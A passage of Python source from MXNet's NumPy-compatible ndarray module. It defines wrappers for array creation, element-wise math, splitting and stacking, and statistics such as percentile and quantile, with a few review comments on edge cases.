@set_module('mxnet.ndarray.numpy')
def eye(N, M=None, k=0, dtype=_np.float32, **kwargs):
    """Return a 2-D array with ones on the k-th diagonal and zeros elsewhere."""
    _sanity_check_params('eye', ['order'], kwargs)
    ctx = kwargs.pop('ctx', current_context())
    # An explicit ctx=None keyword still falls back to the current context.
    if ctx is None:
        ctx = current_context()
    return _npi.eye(N, M, k, ctx, dtype)
@set_module('mxnet.ndarray.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None):
    """Return ``num`` evenly spaced samples over ``[start, stop]`` (scalar endpoints only)."""
    if isinstance(start, (list, _np.ndarray, NDArray)) or \
            isinstance(stop, (list, _np.ndarray, NDArray)):
        raise NotImplementedError('start and stop only support int')
    if axis != 0:
        raise NotImplementedError("the function only support axis 0")
    if ctx is None:
        ctx = current_context()
    if retstep:
        # NOTE(review): num == 1 divides by zero here — confirm callers never do that.
        step = (stop - start) / (num - 1)
        return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype), step
    else:
        return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None):
    """Return ``num`` samples spaced evenly on a log scale from ``base**start`` to ``base**stop``."""
    if isinstance(start, (list, tuple, _np.ndarray, NDArray)) or \
            isinstance(stop, (list, tuple, _np.ndarray, NDArray)):
        raise NotImplementedError('start and stop only support int and float')
    if axis != 0:
        raise NotImplementedError("the function only support axis 0")
    if ctx is None:
        ctx = current_context()
    return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def expand_dims(a, axis):
    """Insert a new axis of length one at position ``axis``."""
    return _npi.expand_dims(a, axis)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def lcm(x1, x2, out=None, **kwargs):
    """Element-wise lowest common multiple; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def tril(m, k=0):
    """Lower triangle of an array: elements above the k-th diagonal zeroed out."""
    return _npi.tril(m, k)
def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs):
    """Dispatch a unary ufunc: ``fn_scalar`` for Python scalars, ``fn_array`` for NDArrays."""
    if isinstance(x, numeric_types):
        return fn_scalar(x, **kwargs)
    elif isinstance(x, NDArray):
        return fn_array(x, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))
# --- element-wise unary ufuncs: thin wrappers over _unary_func_helper ---
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sin(x, out=None, **kwargs):
    """Trigonometric sine, element-wise."""
    return _unary_func_helper(x, _npi.sin, _np.sin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cos(x, out=None, **kwargs):
    """Trigonometric cosine, element-wise."""
    return _unary_func_helper(x, _npi.cos, _np.cos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sinh(x, out=None, **kwargs):
    """Hyperbolic sine, element-wise."""
    return _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cosh(x, out=None, **kwargs):
    """Hyperbolic cosine, element-wise."""
    return _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tanh(x, out=None, **kwargs):
    """Hyperbolic tangent, element-wise."""
    return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log10(x, out=None, **kwargs):
    """Base-10 logarithm, element-wise."""
    return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sqrt(x, out=None, **kwargs):
    """Non-negative square root, element-wise."""
    return _unary_func_helper(x, _npi.sqrt, _np.sqrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cbrt(x, out=None, **kwargs):
    """Cube root, element-wise."""
    return _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def abs(x, out=None, **kwargs):
    """Absolute value, element-wise."""
    return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def absolute(x, out=None, **kwargs):
    """Absolute value, element-wise (alias of ``abs`` semantics)."""
    return _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sign(x, out=None, **kwargs):
    """Element-wise indication of the sign of each value."""
    return _unary_func_helper(x, _npi.sign, _np.sign, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def exp(x, out=None, **kwargs):
    """Exponential, element-wise."""
    return _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def expm1(x, out=None, **kwargs):
    """``exp(x) - 1``, element-wise."""
    return _unary_func_helper(x, _npi.expm1, _np.expm1, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsin(x, out=None, **kwargs):
    """Inverse sine, element-wise."""
    return _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccos(x, out=None, **kwargs):
    """Inverse cosine, element-wise."""
    return _unary_func_helper(x, _npi.arccos, _np.arccos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctan(x, out=None, **kwargs):
    """Inverse tangent, element-wise."""
    return _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log(x, out=None, **kwargs):
    """Natural logarithm, element-wise."""
    return _unary_func_helper(x, _npi.log, _np.log, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def degrees(x, out=None, **kwargs):
    """Convert angles from radians to degrees, element-wise."""
    return _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rad2deg(x, out=None, **kwargs):
    """Convert radians to degrees, element-wise."""
    # NOTE(review): unlike sin/cos this wrapper drops **kwargs — confirm intentional.
    return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rint(x, out=None, **kwargs):
    """Round to the nearest integer, element-wise."""
    return _unary_func_helper(x, _npi.rint, _np.rint, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log2(x, out=None, **kwargs):
    """Base-2 logarithm, element-wise."""
    return _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log1p(x, out=None, **kwargs):
    """``log(1 + x)``, element-wise."""
    return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def radians(x, out=None, **kwargs):
    """Convert angles from degrees to radians, element-wise."""
    return _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def deg2rad(x, out=None, **kwargs):
    """Convert degrees to radians, element-wise (**kwargs dropped, as in rad2deg)."""
    return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def reciprocal(x, out=None, **kwargs):
    """Reciprocal ``1/x``, element-wise."""
    return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def square(x, out=None, **kwargs):
    """Element-wise square."""
    return _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def negative(x, out=None, **kwargs):
    """Numerical negative ``-x``, element-wise (**kwargs dropped)."""
    return _unary_func_helper(x, _npi.negative, _np.negative, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def fix(x, out=None, **kwargs):
    """Round towards zero, element-wise (**kwargs dropped)."""
    return _unary_func_helper(x, _npi.fix, _np.fix, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tan(x, out=None, **kwargs):
    """Trigonometric tangent, element-wise."""
    return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def ceil(x, out=None, **kwargs):
    """Ceiling, element-wise."""
    return _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def floor(x, out=None, **kwargs):
    """Floor, element-wise."""
    return _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def bitwise_not(x, out=None, **kwargs):
    """Bitwise NOT, element-wise."""
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def invert(x, out=None, **kwargs):
    """Bitwise inversion; alias of ``bitwise_not``."""
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def trunc(x, out=None, **kwargs):
    """Truncate towards zero, element-wise."""
    return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def logical_not(x, out=None, **kwargs):
    """Logical NOT, element-wise."""
    return _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsinh(x, out=None, **kwargs):
    """Inverse hyperbolic sine, element-wise."""
    return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccosh(x, out=None, **kwargs):
    """Inverse hyperbolic cosine, element-wise."""
    return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctanh(x, out=None, **kwargs):
    """Inverse hyperbolic tangent, element-wise."""
    return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def tile(A, reps):
    """Construct an array by repeating ``A`` the number of times given by ``reps``."""
    return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps)
@set_module('mxnet.ndarray.numpy')
def split(ary, indices_or_sections, axis=0):
    """Split ``ary`` into multiple sub-arrays along ``axis``.

    An int means equal sections (must divide the axis evenly); a sequence
    gives explicit split indices.
    """
    axis_size = ary.shape[axis]
    if isinstance(indices_or_sections, integer_types):
        sections = indices_or_sections
        if axis_size % sections:
            raise ValueError('array split does not result in an equal division')
        section_size = int(axis_size / sections)
        indices = [i * section_size for i in range(sections)]
    elif isinstance(indices_or_sections, (list, set, tuple)):
        indices = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    ret = _npi.split(ary, indices, axis, False)
    assert isinstance(ret, list), 'Output of split should be list,' \
                                  ' got a return type {}'.format(type(ret))
    return ret
@set_module('mxnet.ndarray.numpy')
def array_split(ary, indices_or_sections, axis=0):
    """Split ``ary`` into sub-arrays along ``axis``; unlike ``split``, uneven sections are allowed."""
    indices = []
    sections = 0
    if isinstance(indices_or_sections, integer_types):
        sections = indices_or_sections
    elif isinstance(indices_or_sections, (list, set, tuple)):
        indices = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    ret = _npi.split(ary, indices, axis, False, sections)
    if not isinstance(ret, list):
        # single output: normalize to a one-element list, numpy-style
        return [ret]
    return ret
@set_module('mxnet.ndarray.numpy')
def hsplit(ary, indices_or_sections):
    """Split ``ary`` horizontally (column-wise) into multiple sub-arrays."""
    if len(ary.shape) < 1:
        raise ValueError('hsplit only works on arrays of 1 or more dimensions')
    indices = []
    sections = 0
    if isinstance(indices_or_sections, integer_types):
        sections = indices_or_sections
    elif isinstance(indices_or_sections, (list, set, tuple)):
        indices = [0] + list(indices_or_sections)
    else:
        raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
    ret = _npi.hsplit(ary, indices, 1, False, sections)
    if not isinstance(ret, list):
        return [ret]
    return ret
@set_module('mxnet.ndarray.numpy')
def vsplit(ary, indices_or_sections):
    """Split ``ary`` vertically (row-wise, axis 0) into multiple sub-arrays."""
    if len(ary.shape) < 2:
        raise ValueError("vsplit only works on arrays of 2 or more dimensions")
    return split(ary, indices_or_sections, 0)
@set_module('mxnet.ndarray.numpy')
def dsplit(ary, indices_or_sections):
    """Split ``ary`` along the third axis (depth) into multiple sub-arrays."""
    if len(ary.shape) < 3:
        raise ValueError('dsplit only works on arrays of 3 or more dimensions')
    return split(ary, indices_or_sections, 2)
@set_module('mxnet.ndarray.numpy')
def concatenate(seq, axis=0, out=None):
    """Join a sequence of arrays along an existing axis."""
    return _npi.concatenate(*seq, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def append(arr, values, axis=None):
    """Append ``values`` to the end of ``arr`` along ``axis`` (flattened when None)."""
    return _npi.concatenate(arr, values, axis=axis, out=None)
@set_module('mxnet.ndarray.numpy')
def stack(arrays, axis=0, out=None):
    """Join a sequence of arrays along a new axis."""
    def get_list(arrays):
        # NOTE(review): this rejects iterable-but-not-subscriptable inputs
        # (e.g. generators) — confirm that is intentional.
        if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
            raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
        return [arr for arr in arrays]
    arrays = get_list(arrays)
    return _npi.stack(*arrays, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def vstack(arrays, out=None):
    """Stack arrays in sequence vertically (row wise)."""
    def get_list(arrays):
        # NOTE(review): iterable-but-not-subscriptable inputs are rejected here.
        if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
            raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
        return [arr for arr in arrays]
    arrays = get_list(arrays)
    return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def row_stack(arrays):
    """Stack arrays vertically (row wise); same backend op as ``vstack``."""
    def get_list(arrays):
        # NOTE(review): iterable-but-not-subscriptable inputs are rejected here.
        if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
            raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
        return [arr for arr in arrays]
    arrays = get_list(arrays)
    return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def column_stack(tup):
    """Stack 1-D arrays as columns into a 2-D array."""
    return _npi.column_stack(*tup)
@set_module('mxnet.ndarray.numpy')
def hstack(arrays):
    """Stack arrays in sequence horizontally (column wise)."""
    return _npi.hstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def dstack(arrays):
    """Stack arrays in sequence depth wise (along the third axis)."""
    return _npi.dstack(*arrays)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def maximum(x1, x2, out=None, **kwargs):
    """Element-wise maximum; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum, _npi.maximum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def minimum(x1, x2, out=None, **kwargs):
    """Element-wise minimum; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum, _npi.minimum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def swapaxes(a, axis1, axis2):
    """Interchange two axes of an array."""
    return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.ndarray.numpy')
def clip(a, a_min, a_max, out=None):
    """Clip the values of ``a`` to the interval ``[a_min, a_max]``.

    At least one bound must be given; a missing bound is treated as
    unbounded (replaced by -inf/+inf before dispatching to the backend).
    """
    if a_min is None:
        if a_max is None:
            raise ValueError('array_clip: must set either max or min')
        a_min = float('-inf')
    if a_max is None:
        a_max = float('inf')
    return _npi.clip(a, a_min, a_max, out=out)
@set_module('mxnet.ndarray.numpy')
def argmax(a, axis=None, out=None):
    """Return the indices of the maximum values along ``axis`` (flattened when None)."""
    return _npi.argmax(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def argmin(a, axis=None, out=None):
    """Return the indices of the minimum values along ``axis`` (flattened when None)."""
    return _npi.argmin(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def average(a, axis=None, weights=None, returned=False, out=None):
    """Compute the (optionally weighted) average along ``axis``."""
    if weights is None:
        return _npi.average(a, axis=axis, weights=None, returned=returned, weighted=False, out=out)
    else:
        # NOTE(review): the weighted call does not pass ``weighted=True`` —
        # presumably the backend defaults to weighted; confirm.
        return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out)
@set_module('mxnet.ndarray.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False):
    """Compute the arithmetic mean along ``axis``."""
    return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
    """Compute the standard deviation along ``axis`` (``ddof`` delta degrees of freedom)."""
    return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
    """Compute the variance along ``axis`` (``ddof`` delta degrees of freedom)."""
    return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
    """Return an array representing the indices of a grid of the given dimensions."""
    if isinstance(dimensions, (tuple, list)):
        if ctx is None:
            ctx = current_context()
        return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
    else:
        raise ValueError("The dimensions must be sequence of ints")
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def copysign(x1, x2, out=None, **kwargs):
    """Change the sign of ``x1`` to that of ``x2``, element-wise."""
    return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign, _npi.copysign_scalar, _npi.rcopysign_scalar, out)
@set_module('mxnet.ndarray.numpy')
def ravel(x, order='C'):
    """Return a contiguous flattened array (C order only)."""
    if order != 'C':
        raise NotImplementedError('order {} is not supported'.format(order))
    if isinstance(x, numeric_types):
        # scalar input: delegate to official numpy
        return _np.reshape(x, -1)
    elif isinstance(x, NDArray):
        return _npi.reshape(x, -1)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
def unravel_index(indices, shape, order='C'):
    """Convert flat indices into a tuple of coordinate arrays, one per dimension.

    Scalar indices are delegated to NumPy; array indices go through the
    backend fallback operator. Only C (row-major) order is supported.

    Fixes: adds the ``@set_module`` decorator that every sibling public
    function in this module carries (it was missing here).
    """
    if order != 'C':
        raise NotImplementedError('Do not support column-major (Fortran-style) order at this moment')
    if isinstance(indices, numeric_types):
        return _np.unravel_index(indices, shape)
    ret = _npi.unravel_index_fallback(indices, shape=shape)
    # The fallback returns one coordinate array per dimension.
    return tuple(ret)
@set_module('mxnet.ndarray.numpy')
def diag_indices_from(arr):
    """Return the indices to access the main diagonal of *arr* as a tuple of arrays.

    Fixes: adds the ``@set_module`` decorator for consistency with every other
    public function in this module (it was missing here).
    """
    return tuple(_npi.diag_indices_from(arr))
@set_module('mxnet.ndarray.numpy')
def hanning(M, dtype=_np.float32, ctx=None):
    """Return the Hanning window of length M on the given context."""
    if ctx is None:
        ctx = current_context()
    return _npi.hanning(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def hamming(M, dtype=_np.float32, ctx=None):
    """Return the Hamming window of length M on the given context."""
    if ctx is None:
        ctx = current_context()
    return _npi.hamming(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def blackman(M, dtype=_np.float32, ctx=None):
    """Return the Blackman window of length M on the given context."""
    if ctx is None:
        ctx = current_context()
    return _npi.blackman(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def flip(m, axis=None, out=None):
    """Reverse the order of elements along the given axis (all axes if axis is None)."""
    from ...numpy import ndarray
    if isinstance(m, ndarray):
        return _npi.flip(m, axis, out=out)
    if isinstance(m, numeric_types):
        return _np.flip(m, axis)
    raise TypeError('type {} not supported'.format(str(type(m))))
@set_module('mxnet.ndarray.numpy')
def flipud(m):
    """Flip an array vertically (reverse along axis 0)."""
    return flip(m, 0)
@set_module('mxnet.ndarray.numpy')
def fliplr(m):
    """Flip an array horizontally (reverse along axis 1)."""
    return flip(m, 1)
@set_module('mxnet.ndarray.numpy')
def around(x, decimals=0, out=None, **kwargs):
    """Evenly round to the given number of decimals; scalars are delegated to NumPy."""
    from ...numpy import ndarray
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
    elif isinstance(x, ndarray):
        return _npi.around(x, decimals, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
def round(x, decimals=0, out=None, **kwargs):
    """Round an array to the given number of decimals.

    Alias of :func:`around`. Delegating (instead of duplicating the dispatch
    body) keeps the two entry points from drifting apart.
    """
    return around(x, decimals, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def arctan2(x1, x2, out=None, **kwargs):
    """Element-wise arc tangent of x1/x2, choosing the quadrant correctly."""
    return _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2,
                         _npi.arctan2_scalar, _npi.rarctan2_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def hypot(x1, x2, out=None, **kwargs):
    """Element-wise hypotenuse sqrt(x1**2 + x2**2)."""
    return _ufunc_helper(x1, x2, _npi.hypot, _np.hypot, _npi.hypot_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_and(x1, x2, out=None, **kwargs):
    """Element-wise bitwise AND."""
    return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_xor(x1, x2, out=None, **kwargs):
    """Element-wise bitwise XOR."""
    return _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor, _npi.bitwise_xor_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_or(x1, x2, out=None, **kwargs):
    """Element-wise bitwise OR."""
    return _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or, _npi.bitwise_or_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def ldexp(x1, x2, out=None, **kwargs):
    """Element-wise x1 * 2**x2."""
    return _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp, _npi.ldexp_scalar, _npi.rldexp_scalar, out)
@set_module('mxnet.ndarray.numpy')
def inner(a, b):
    """Inner product over the last axes of a and b."""
    return tensordot(a, b, [-1, -1])
@set_module('mxnet.ndarray.numpy')
def outer(a, b):
    """Outer product of the flattened inputs."""
    return tensordot(a.flatten(), b.flatten(), 0)
@set_module('mxnet.ndarray.numpy')
def vdot(a, b):
    """Dot product of the flattened inputs."""
    return tensordot(a.flatten(), b.flatten(), 1)
@set_module('mxnet.ndarray.numpy')
def equal(x1, x2, out=None):
    """Element-wise x1 == x2."""
    return _ufunc_helper(x1, x2, _npi.equal, _np.equal, _npi.equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def not_equal(x1, x2, out=None):
    """Element-wise x1 != x2."""
    return _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal, _npi.not_equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def greater(x1, x2, out=None):
    """Element-wise x1 > x2 (reflected scalar case dispatches to less_scalar)."""
    return _ufunc_helper(x1, x2, _npi.greater, _np.greater, _npi.greater_scalar,
                         _npi.less_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less(x1, x2, out=None):
    """Element-wise x1 < x2 (reflected scalar case dispatches to greater_scalar)."""
    return _ufunc_helper(x1, x2, _npi.less, _np.less, _npi.less_scalar, _npi.greater_scalar, out)
@set_module('mxnet.ndarray.numpy')
def greater_equal(x1, x2, out=None):
    """Element-wise x1 >= x2 (reflected scalar case dispatches to less_equal_scalar)."""
    return _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal, _npi.greater_equal_scalar,
                         _npi.less_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less_equal(x1, x2, out=None):
    """Element-wise x1 <= x2 (reflected scalar case dispatches to greater_equal_scalar)."""
    return _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal, _npi.less_equal_scalar,
                         _npi.greater_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def rot90(m, k=1, axes=(0, 1)):
    """Rotate an array by 90 degrees k times in the plane specified by axes."""
    return _npi.rot90(m, k=k, axes=axes)
@set_module('mxnet.ndarray.numpy')
def einsum(*operands, **kwargs):
    """Evaluate the Einstein summation convention; the first operand is the subscripts string."""
    optimize_arg = kwargs.pop('optimize', False)
    out = kwargs.pop('out', None)
    subscripts = operands[0]
    operands = operands[1:]
    return _npi.einsum(*operands, subscripts=subscripts, out=out, optimize=int(optimize_arg))
@set_module('mxnet.ndarray.numpy')
def nonzero(a):
    """Return a tuple of arrays, one per dimension, holding the indices of non-zero elements."""
    out = _npi.nonzero(a).transpose()
    return tuple([out[i] for i in range(len(out))])
@set_module('mxnet.ndarray.numpy')
def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):
    """Compute the q-th percentile(s) of the data along the given axis (q in [0, 100])."""
    if overwrite_input is not None:
        raise NotImplementedError('overwrite_input is not supported yet')
    if isinstance(q, numeric_types):
        return _npi.percentile(a, axis=axis, interpolation=interpolation,
                               keepdims=keepdims, q_scalar=q, out=out)
    return _npi.percentile(a, q, axis=axis, interpolation=interpolation,
                           keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):
    """Compute the q-th quantile(s) along the given axis (q in [0, 1]).

    Implemented on top of the percentile backend operator by scaling q to
    [0, 100].
    """
    if overwrite_input is not None:
        raise NotImplementedError('overwrite_input is not supported yet')
    if isinstance(q, numeric_types):
        return _npi.percentile(a, axis=axis, interpolation=interpolation,
                               keepdims=keepdims, q_scalar=q * 100, out=out)
    if isinstance(q, (list, tuple)):
        # Bug fix: `q * 100` on a Python sequence *repeats* it 100 times
        # instead of scaling the values, so scale element-wise instead.
        q = [v * 100 for v in q]
    else:
        q = q * 100
    return _npi.percentile(a, q, axis=axis, interpolation=interpolation,
                           keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def shares_memory(a, b, max_work=None):
    """Return True if a and b share memory (max_work is accepted for API parity but ignored)."""
    return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def may_share_memory(a, b, max_work=None):
    """Return True if a and b might share memory; uses the same backend check as shares_memory."""
    return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def diff(a, n=1, axis=-1, prepend=None, append=None):
    """Calculate the n-th discrete difference along the given axis.

    The ``prepend``/``append`` options are not supported yet and raise
    NotImplementedError when supplied.
    """
    # Bug fix: the original `if (prepend or append)` raises an ambiguous-truth
    # error for array-valued arguments and silently accepts falsy values like
    # 0; compare against None explicitly instead.
    if prepend is not None or append is not None:
        raise NotImplementedError('prepend and append options are not supported yet')
    return _npi.diff(a, n=n, axis=axis)
@set_module('mxnet.ndarray.numpy')
def resize(a, new_shape):
    """Return a new array with the specified shape (backend fallback operator)."""
    return _npi.resize_fallback(a, new_shape=new_shape)
@set_module('mxnet.ndarray.numpy')
def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs):
    """Replace NaN/infinity with finite numbers; integer arrays are returned unchanged."""
    if isinstance(x, numeric_types):
        return _np.nan_to_num(x, copy, nan, posinf, neginf)
    elif isinstance(x, NDArray):
        if x.dtype in ['int8', 'uint8', 'int32', 'int64']:
            # Integer dtypes cannot hold NaN/inf, so there is nothing to replace.
            return x
        if not copy:
            # In-place variant: write the result back into x via out=x.
            return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=x)
        return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=None)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isnan(x, out=None, **kwargs):
    """Test element-wise for NaN."""
    return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
